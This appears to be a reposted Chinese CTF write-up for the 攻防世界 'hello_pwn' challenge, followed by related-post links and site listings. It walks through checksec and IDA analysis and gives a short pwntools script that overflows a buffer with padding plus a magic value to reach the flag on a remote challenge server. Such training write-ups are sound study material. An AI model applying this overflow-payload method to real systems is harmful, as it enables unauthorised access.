攻防世界—pwn—hello_pwn

其他 2020-04-03 19:34:13 阅读次数: 0

题目分析

下载文件后首先使用checksec检查文件保护机制

使用ida查看伪代码

思路明确，让dword_60106C == 1853186401即可输出flag

信息收集

偏移量

sub_400686函数地址

编写脚本

from pwn import *

p = remote('111.198.29.45',36884)
#p = process("./pwn002")
payload = "A"*4 + p64(1853186401)
p.sendline(payload)
p.interactive()

本地测试

靶机测试

猜你喜欢

转载自www.cnblogs.com/anweilx/p/12628439.html

攻防世界 | hello_pwn

攻防世界--hello_pwn

攻防世界—pwn—hello_pwn

pwn学习（1）攻防世界-hello_pwn

[CTF-PWN]攻防世界新手村-hello_pwn[wp]

hello_pwn

攻防世界-PWN-hello_pwn

xctf-pwn hello_pwn

nuaactf hello_pwn writeup

攻防世界_pwn_hello_pwn(萌新版)

XCTF hello_pwn write up

攻防世界 pwn welpwn

攻防世界 pwn string

攻防世界PWN题 pwn-100

攻防世界 pwn100&&pwn200

攻防世界(Pwn) PWN100

[攻防世界]pwn1

攻防世界 pwn-200

攻防世界PWN题 forgot

攻防世界PWN题 string

攻防世界 Pwn 新手

CTF(pwn)攻防世界warmup

攻防世界 pwn进阶区 pwn-200

攻防世界pwn100 pwn200

PWN-整型溢出-攻防世界-PWN-int_overflow

【PWN系列】攻防世界pwn进阶区welpwn分析

【pwn】攻防世界 pwn新手区wp

攻防世界pwn-Mary_Morton

攻防世界pwn之新手区

攻防世界 pwn1 wp

今日推荐

中国码农的“35岁魔咒”

蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版，免费下载

Arc Browser for Windows 1.0 正式 GA

90后程序员开发视频搬运软件、不到一年获利超 700 万，结局很刑！

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

周排行

[编程题]学英语

[codeforces 1288A] Deadline 约数+模

Python的web开发

Docker在Centos 7上的部署

python编码

解决Ubuntu16.04 fatal error: json/json.h: No such file or directory

mysql并发插入

rest接口如何适应jsonp的方案

linux 终端上网设置

高数——等号两边同时求导、积分的解释

每日归档

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)